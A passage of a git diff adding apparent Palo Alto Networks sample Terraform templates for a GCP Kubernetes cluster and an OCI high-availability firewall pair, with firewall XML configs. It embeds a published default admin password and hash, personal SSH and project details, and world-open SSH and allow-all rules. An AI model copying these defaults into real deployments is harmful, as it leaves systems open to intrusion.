terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/gcp/k8s-Prisma-API/Main.tf b/gcp/k8s-Prisma-API/Main.tf new file mode 100644 index 00000000..92932bc5 --- /dev/null +++ b/gcp/k8s-Prisma-API/Main.tf @@ -0,0 +1,358 @@ +provider "google" { + credentials = "${file(var.credentials_file_path)}" + project = "${var.my_gcp_project}" + region = "${var.region}" +} + +// Adding SSH Public Key Project Wide +resource "google_compute_project_metadata_item" "ssh-keys" { + key = "ssh-keys" + value = "${var.gce_ssh_user}:${var.gce_ssh_pub_key}" +} + +// Adding VPC Networks to Project MANAGEMENT +resource "google_compute_subnetwork" "management-sub" { + name = "management-sub" + ip_cidr_range = "10.5.0.0/24" + network = "${google_compute_network.management.self_link}" + region = "${var.region}" +} + +resource "google_compute_network" "management" { + name = "${var.interface_0_name}" + auto_create_subnetworks = "false" +} + +// Adding VPC Networks to Project UNTRUST +resource "google_compute_subnetwork" "untrust-sub" { + name = "untrust-sub" + ip_cidr_range = "10.5.1.0/24" + network = "${google_compute_network.untrust.self_link}" + region = "${var.region}" +} + +resource "google_compute_network" "untrust" { + name = "${var.interface_1_name}" + auto_create_subnetworks = "false" +} + +// Adding VPC Networks to Project TRUST +resource "google_compute_subnetwork" "trust-sub" { + name = "trust-sub" + ip_cidr_range = "10.5.2.0/24" + network = "${google_compute_network.trust.self_link}" + region = "${var.region}" +} + +resource "google_compute_network" "trust" { + name = "${var.interface_2_name}" + auto_create_subnetworks = "false" +} + +// Adding GCP Outbound Route to TRUST Interface +resource "google_compute_route" "trust" { + name = "trust-route" + dest_range = "0.0.0.0/0" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 100 + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + "google_compute_instance.firewall", + "google_container_node_pool.db_nodes", + ] +} + +// Adding GCP Route to Cluster MGMT Endpoint +resource "google_compute_route" "k8mgmt" { + name = "cluster-endpoint-route" + dest_range = "${element(google_container_cluster.cluster.*.endpoint,count.index)}/32" + network = "${google_compute_network.trust.self_link}" + next_hop_gateway = "default-internet-gateway" + priority = 100 + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + "google_compute_instance.firewall", + "google_container_node_pool.db_nodes", + ] +} + +// Adding GCP Firewall Rules for MANGEMENT +resource "google_compute_firewall" "allow-mgmt" { + name = "allow-mgmt" + network = "${google_compute_network.management.self_link}" + + allow { + protocol = "icmp" + } + + allow { + protocol = "tcp" + ports = ["443", "22"] + } + + source_ranges = ["0.0.0.0/0"] +} + +// Adding GCP Firewall Rules for INBOUND +resource "google_compute_firewall" "allow-inbound" { + name = "allow-inbound" + network = "${google_compute_network.untrust.self_link}" + + allow { + protocol = "tcp" + ports = ["80", "22", "8888"] + } + + source_ranges = ["0.0.0.0/0"] +} + +// Adding GCP Firewall Rules for OUTBOUND +resource "google_compute_firewall" "allow-outbound" { + name = "allow-outbound" + network = "${google_compute_network.trust.self_link}" + + allow { + protocol = "all" + + # ports = ["all"] + } + + source_ranges = ["0.0.0.0/0"] +} + +// Create a new Palo Alto Networks NGFW VM-Series GCE instance +resource "google_compute_instance" "firewall" { + name = "${var.firewall_name}-${count.index + 1}" + machine_type = "${var.machine_type_fw}" + zone = "${var.zone}" + can_ip_forward = true + allow_stopping_for_update = true + count = 1 + + // Adding METADATA Key Value pairs to VM-Series GCE instance + metadata { + vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket_fw}" + serial-port-enable = true + + #sshKeys = "${var.public_key}" + } + + service_account { + scopes = "${var.scopes_fw}" + } + + network_interface { + subnetwork = "${google_compute_subnetwork.management-sub.self_link}" + network_ip = "10.5.0.4" + + //address = "10.5.0.4" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.untrust-sub.self_link}" + + network_ip = "10.5.1.4" + access_config = {} + } + + network_interface { + subnetwork = "${google_compute_subnetwork.trust-sub.self_link}" + + network_ip = "10.5.2.100" + } + + boot_disk { + initialize_params { + image = "${var.image_fw}" + } + } + + depends_on = [ + "google_compute_network.trust", + "google_compute_subnetwork.trust-sub", + ] +} + +//Create a K8s cluster +resource "google_container_cluster" "cluster" { + name = "cluster-1" + zone = "${var.zone}" + min_master_version = "${var.container-ver}" + initial_node_count = 2 + enable_kubernetes_alpha = true + cluster_ipv4_cidr = "10.16.0.0/14" + logging_service = "none" + monitoring_service = "none" + network = "${google_compute_network.trust.self_link}" + subnetwork = "${google_compute_subnetwork.trust-sub.self_link}" + + maintenance_policy { + daily_maintenance_window { + start_time = "03:00" + } + } + + addons_config { + http_load_balancing { + disabled = false + } + + horizontal_pod_autoscaling { + disabled = false + } + } + + node_config { + disk_size_gb = "32" + image_type = "COS" + machine_type = "n1-standard-1" + preemptible = false + oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"] + + labels { + pool = "web-pool" + cluster = "the-cluster" + } + + tags = ["the-cluster", "gke-node", "web-tier"] + } + + lifecycle { + create_before_destroy = true + } + + depends_on = [ + "google_compute_network.trust", + "google_compute_subnetwork.trust-sub", + "google_compute_instance.firewall", + ] +} + +resource "google_container_node_pool" "db_nodes" { + name = "db-node-pool" + region = "${var.zone}" + cluster = "${google_container_cluster.cluster.name}" + node_count = 2 + + node_config { + disk_size_gb = "32" + image_type = "COS" + machine_type = "n1-standard-1" + preemptible = false + oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"] + + labels { + pool = "db-pool" + cluster = "the-cluster" + } + + tags = ["the-cluster", "gke-node", "db-tier"] + } + + lifecycle { + create_before_destroy = true + } + + depends_on = [ + "google_compute_network.trust", + "google_compute_subnetwork.trust-sub", + "google_compute_instance.firewall", + "google_container_cluster.cluster", + ] +} + +// Adding GCP Route to Node instances +resource "google_compute_route" "gke-node0" { + name = "gke-node0" + dest_range = "10.16.0.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["db-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +resource "google_compute_route" "gke-node1" { + name = "gke-node1" + dest_range = "10.16.1.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["db-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +resource "google_compute_route" "gke-node2" { + name = "gke-node2" + dest_range = "10.16.2.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["web-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +resource "google_compute_route" "gke-node3" { + name = "gke-node3" + dest_range = "10.16.3.0/24" + network = "${google_compute_network.trust.self_link}" + next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}" + next_hop_instance_zone = "${var.zone}" + priority = 10 + tags = ["web-tier"] + + depends_on = ["google_compute_instance.firewall", + "google_compute_network.trust", + "google_compute_network.untrust", + "google_compute_network.management", + "google_container_cluster.cluster", + ] +} + +output "pan-tf-name" { + value = "${google_compute_instance.firewall.*.name}" +} + +output "k8s-cluster-name" { + value = "${google_container_cluster.cluster.*.name}" +} + +output "k8s-cluster-endpoint" { + value = "${google_container_cluster.cluster.*.endpoint}" +} + +output "k8s-cluster_ipv4_cidr" { + value = "${google_container_cluster.cluster.*.cluster_ipv4_cidr}" +} diff --git a/gcp/k8s-Prisma-API/README.md b/gcp/k8s-Prisma-API/README.md new file mode 100644 index 00000000..ccfbe6c9 --- /dev/null +++ b/gcp/k8s-Prisma-API/README.md @@ -0,0 +1,2 @@ +# k8s-terraform-skillet +This Repository Holds the Terraform template in a PANW Skillet format to deploy a GKE K8s cluster that supports E/W inspection. diff --git a/gcp/k8s-Prisma-API/Variables.tf b/gcp/k8s-Prisma-API/Variables.tf new file mode 100644 index 00000000..fdb1944c --- /dev/null +++ b/gcp/k8s-Prisma-API/Variables.tf @@ -0,0 +1,72 @@ +// PROJECT Variables +variable "container-ver" { + default = "1.11.8-gke.6" +} + +variable "my_gcp_project" { + default = "djs-gcp-2018" +} + +variable "region" { + default = "us-central1" +} + +variable "zone" { + default = "us-central1-a" +} + +variable "credentials_file_path" { + description = "Path to the JSON file used to describe your account credentials" + default = "/Users/dspears/GCP/k8-test/djs-gcp-2018-creds.json" +} + +variable "gce_ssh_user" { + description = " ssh user that is used in the public key" + default = "dspears@SJCMAC3024G8WL" +} + +variable "gce_ssh_pub_key" { + description = " ssh key in the format: ssh-rsa username " + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bjwWN/LY87FOZH/uuRXS5ku3OXkxsFIvecXMNDoeTNZU5QSM3bAV8t/IU52GsdQO+f2hv9iVulMfYPwxsMcVen32q+t6dcgtChUXPSk+giGqf71iR2xiqGdk6GgC705SUXG/AX1whNI1qT84wP0nOrJaoGo/SZq4Ryel9mptu1Ifj1vMphyw2WOFOMB3IuUYckZHgwbQxZK4iCGJSZmzP+M03oSKZATwvuI1XXUIUVTCcV45NofgCW3Ocfk0UjhK01l1SO3H4+c+v40Zufpqo4vPMOQajTggygpJ7SRCgOYWJxcdx4cr9ASNteii5LQFqAixJD0+0izXfQEUm0/T dspears@SJCMAC3024G8WL" +} + +//The rest of the variables do not need to be modified for the K8s Lab +// VM-Series Firewall Variables + +variable "firewall_name" { + default = "firewall" +} + +variable "image_fw" { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-810" + + //default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810" +} + +variable "machine_type_fw" { + default = "n1-standard-4" +} + +variable "bootstrap_bucket_fw" { + default = "k8-ew" +} + +variable "interface_0_name" { + default = "management" +} + +variable "interface_1_name" { + default = "untrust" +} + +variable "interface_2_name" { + default = "trust" +} + +variable "scopes_fw" { + default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} diff --git a/oci/HA/OCI HA deployment guide.pdf b/oci/HA/OCI HA deployment guide.pdf new file mode 100644 index 00000000..d41da875 Binary files /dev/null and b/oci/HA/OCI HA deployment guide.pdf differ diff --git a/oci/HA/OCI-HA.png b/oci/HA/OCI-HA.png new file mode 100644 index 00000000..128459fc Binary files /dev/null and b/oci/HA/OCI-HA.png differ diff --git a/oci/HA/README.md b/oci/HA/README.md new file mode 100644 index 00000000..3928a15c --- /dev/null +++ b/oci/HA/README.md @@ -0,0 +1,32 @@ +# Sample HA deployment for OCI + +Terraform creates: +- A single compartment to house all infrastructure +- A VCN with 5 regional subnets (management, untrust, trust, ha2, web) +- 2 VM-Series firewalls in separate Availability Domains (ADs) +- A test server +- OCI Dynamic Groups and Policies for secondary IP address management + +HA in OCI works by moving secondary IP addresses from the down FW to the newly-active one. This is accomplished by the VM-Series plugin avilable beginning with PANOS 9.1.1 in OCI. + +
+

+ +

+ +Prior to deployment, update terraform.tfvars with the following information: +- tenancy_ocid - The OCID of the target tenancy +- user_ocid - The OCID of the user deploying the infrastructure +- fingerprint - The fingerprint associated with the user's API key +- private_key_path - The absolute path to the PEM-formatted private SSH key for the user +- parent_compartment_ocid - The OCID of the parent/root compartment +- ssh_authorized_key - The public SSH key for the user (format = "ssh-rsa ") +- fw_mgmt_src_ip - The IP or subnet authorized to connect to the FW post-deployment + +By default, the deployment is into us-ashburn-1. This may be altered by changing the relevant variables in terraform.tfvars. + +The folder fw-configs contains sample configuration files for the FW. These configuration files have HA pre-configured, allow SSH access to the server, and permit all outbound access to the internet. The username is 'admin' and the password is 'Pal0Alt0@123', which should be changed immediately. + +## Support Policy +These files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/oci/HA/compartment.tf b/oci/HA/compartment.tf new file mode 100644 index 00000000..0b053323 --- /dev/null +++ b/oci/HA/compartment.tf @@ -0,0 +1,6 @@ +resource "oci_identity_compartment" "compartment" { + compartment_id = "${var.parent_compartment_ocid}" + name = "${var.compartment_name}" + description = "compartment created by terraform" + enable_delete = true +} \ No newline at end of file diff --git a/oci/HA/firewalls.tf b/oci/HA/firewalls.tf new file mode 100644 index 00000000..2496016e --- /dev/null +++ b/oci/HA/firewalls.tf @@ -0,0 +1,60 @@ +resource "oci_core_instance" "firewall1" { + availability_domain = "${var.fw1_availability_domain}" + compartment_id = "${oci_identity_compartment.compartment.id}" + display_name = "FW-A" + shape = "${var.fw_shape_size}" + + create_vnic_details { + subnet_id = "${oci_core_subnet.management.id}" + private_ip = "${var.fw1_management_ip}" + display_name = "management" + assign_public_ip = true + skip_source_dest_check = false + #nsg_ids = ["${oci_core_network_security_group.management.id}"] + } + + source_details { + source_type = "image" + source_id = "${var.fw_ocid}" + boot_volume_size_in_gbs = "60" + } + preserve_boot_volume = false + + metadata = { + ssh_authorized_keys = "${var.ssh_authorized_key}" +# user_data = "${base64encode(file("./userdata/bootstrap"))}" + } + timeouts { + create = "60m" + } +} +resource "oci_core_instance" "firewall2" { + availability_domain = "${var.fw2_availability_domain}" + compartment_id = "${oci_identity_compartment.compartment.id}" + display_name = "FW-B" + shape = "${var.fw_shape_size}" + + create_vnic_details { + subnet_id = "${oci_core_subnet.management.id}" + private_ip = "${var.fw2_management_ip}" + display_name = "management" + assign_public_ip = true + skip_source_dest_check = false + #nsg_ids = ["${oci_core_network_security_group.management.id}"] + } + + source_details { + source_type = "image" + source_id = "${var.fw_ocid}" + boot_volume_size_in_gbs = "60" + } + preserve_boot_volume = false + + metadata = { + ssh_authorized_keys = "${var.ssh_authorized_key}" +# user_data = "${base64encode(file("./userdata/bootstrap"))}" + } + timeouts { + create = "60m" + } +} \ No newline at end of file diff --git a/oci/HA/fw-configs/HA-FWA.xml b/oci/HA/fw-configs/HA-FWA.xml new file mode 100644 index 00000000..ae6c5c2d --- /dev/null +++ b/oci/HA/fw-configs/HA-FWA.xml @@ -0,0 +1,623 @@ + + + + + + $1$xeppcrov$vOPkvdPeYIsmcsGromCxB0 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + no + + + + + + no + + + + + + + no + + + + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 192.168.101.0/24 + + + + + + + + + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FWA + 192.168.0.11 + 255.255.255.0 + 192.168.0.1 + + + 169.254.169.254 + 8.8.8.8 + + + + + us.pool.ntp.org + + + + + + pool.ntp.org + + + + + + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + yes + no + no + no + + + + + yes + + + + + management + + + + ethernet1/3 + 192.168.30.101 + 255.255.255.0 + 192.168.30.1 + + + + 1 + 192.168.0.12 + + ip + + + 101 + + + + + + + auto + + + + yes + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + web1 + + + untrust + + + untrust + + + any + + + any + + any + any + + + + + + fw-untrust + + + + + untrust + + + trust + + + any + + + any + + any + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.101.2 + + + 192.168.1.100 + +
+
+
+
+
+
diff --git a/oci/HA/fw-configs/HA-FWB.xml b/oci/HA/fw-configs/HA-FWB.xml new file mode 100644 index 00000000..6b5d41ce --- /dev/null +++ b/oci/HA/fw-configs/HA-FWB.xml @@ -0,0 +1,623 @@ + + + + + + $1$xeppcrov$vOPkvdPeYIsmcsGromCxB0 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + no + + + + + + no + + + + + + + no + + + + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 192.168.101.0/24 + + + + + + + + + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FWB + 192.168.0.12 + 255.255.255.0 + 192.168.0.1 + + + 169.254.169.254 + 8.8.8.8 + + + + + us.pool.ntp.org + + + + + + pool.ntp.org + + + + + + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + yes + no + no + no + + + + + yes + + + + + management + + + + ethernet1/3 + 192.168.30.102 + 255.255.255.0 + 192.168.30.1 + + + + 1 + 192.168.0.11 + + ip + + + 102 + + + + + + + auto + + + + yes + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + + + + + web1 + + + untrust + + + untrust + + + any + + + any + + any + any + + + + + + fw-untrust + + + + + untrust + + + trust + + + any + + + any + + any + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.101.2 + + + 192.168.1.100 + +
+
+
+
+
+
diff --git a/oci/HA/identity_policy.tf b/oci/HA/identity_policy.tf new file mode 100644 index 00000000..c2d601b7 --- /dev/null +++ b/oci/HA/identity_policy.tf @@ -0,0 +1,14 @@ +resource "oci_identity_dynamic_group" "ha" { + compartment_id = "${var.tenancy_ocid}" + name = "HA" + description = "dynamic group created by terraform" + matching_rule = "any {ANY {instance.id = '${oci_core_instance.firewall1.id}',instance.id = '${oci_core_instance.firewall2.id}'}}" +} +resource "oci_identity_policy" "ha" { + name = "HA" + description = "dynamic policy created by terraform" + compartment_id = "${oci_identity_compartment.compartment.id}" + statements = ["Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use virtual-network-family in compartment ${oci_identity_compartment.compartment.name}", + "Allow dynamic-group ${oci_identity_dynamic_group.ha.name} to use instance-family in compartment ${oci_identity_compartment.compartment.name}", + ] +} \ No newline at end of file diff --git a/oci/HA/internet_gateway.tf b/oci/HA/internet_gateway.tf new file mode 100644 index 00000000..27439e7d --- /dev/null +++ b/oci/HA/internet_gateway.tf @@ -0,0 +1,6 @@ +resource "oci_core_internet_gateway" "internet_gateway" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "IG-PANW" + enabled = true +} \ No newline at end of file diff --git a/oci/HA/providers.tf b/oci/HA/providers.tf new file mode 100644 index 00000000..27515797 --- /dev/null +++ b/oci/HA/providers.tf @@ -0,0 +1,11 @@ +#terraform { +# required_version = ">= 0.12" +#} + +provider "oci" { + tenancy_ocid = "${var.tenancy_ocid}" + user_ocid = "${var.user_ocid}" + fingerprint = "${var.fingerprint}" + private_key_path = "${var.private_key_path}" + region = "${var.region}" +} \ No newline at end of file diff --git a/oci/HA/route_tables.tf b/oci/HA/route_tables.tf new file mode 100644 index 00000000..2e086160 --- /dev/null +++ b/oci/HA/route_tables.tf @@ -0,0 +1,24 @@ +resource "oci_core_route_table" "public" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "RT-Public" + + route_rules { + description = "default" + destination = "0.0.0.0/0" + destination_type = "CIDR_BLOCK" + network_entity_id = "${oci_core_internet_gateway.internet_gateway.id}" + } +} +resource "oci_core_route_table" "web" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "RT-Web" + + route_rules { + description = "default" + destination = "0.0.0.0/0" + destination_type = "CIDR_BLOCK" + network_entity_id = "${oci_core_private_ip.firewall_trust_secondary_private.id}" + } +} \ No newline at end of file diff --git a/oci/HA/secondary_ips.tf b/oci/HA/secondary_ips.tf new file mode 100644 index 00000000..289254e3 --- /dev/null +++ b/oci/HA/secondary_ips.tf @@ -0,0 +1,17 @@ +// The secondary IP addresses are initially attached to firewall1 but will float between the firewalls in the event of a failover. +resource "oci_core_private_ip" "firewall_untrust_secondary_private" { + vnic_id = "${oci_core_vnic_attachment.firewall1_untrust.vnic_id}" + display_name = "firewall_untrust_secondary_private" + ip_address = "${var.untrust_floating_ip}" +} +resource "oci_core_private_ip" "firewall_trust_secondary_private" { + vnic_id = "${oci_core_vnic_attachment.firewall1_trust.vnic_id}" + display_name = "firewall_trust_secondary_private" + ip_address = "${var.trust_floating_ip}" +} +resource "oci_core_public_ip" "firewall_untrust_secondary_public" { + compartment_id = "${oci_identity_compartment.compartment.id}" + lifetime = "RESERVED" + display_name = "firewall_untrust_secondary_public" + private_ip_id = "${oci_core_private_ip.firewall_untrust_secondary_private.id}" +} \ No newline at end of file diff --git a/oci/HA/security_lists.tf b/oci/HA/security_lists.tf new file mode 100644 index 00000000..bfa97d25 --- /dev/null +++ b/oci/HA/security_lists.tf @@ -0,0 +1,78 @@ +resource "oci_core_security_list" "management" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-mgmt" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "6" + source = "${var.fw_mgmt_src_ip}" + stateless = false + tcp_options { + min = 22 + max = 22 + } + } + ingress_security_rules { + protocol = "6" + source = "${var.fw_mgmt_src_ip}" + stateless = false + tcp_options { + min = 443 + max = 443 + } + } + ingress_security_rules { + protocol = "all" + source = "${var.management_cidr}" + stateless = false + } +} +resource "oci_core_security_list" "untrust" { + compartment_id = "${oci_identity_compartment.compartment.id}" + vcn_id = "${oci_core_vcn.vcn.id}" + display_name = "SL-untrust" + egress_security_rules { + protocol = "all" + destination = "0.0.0.0/0" + stateless = false + } + ingress_security_rules { + protocol = "all" 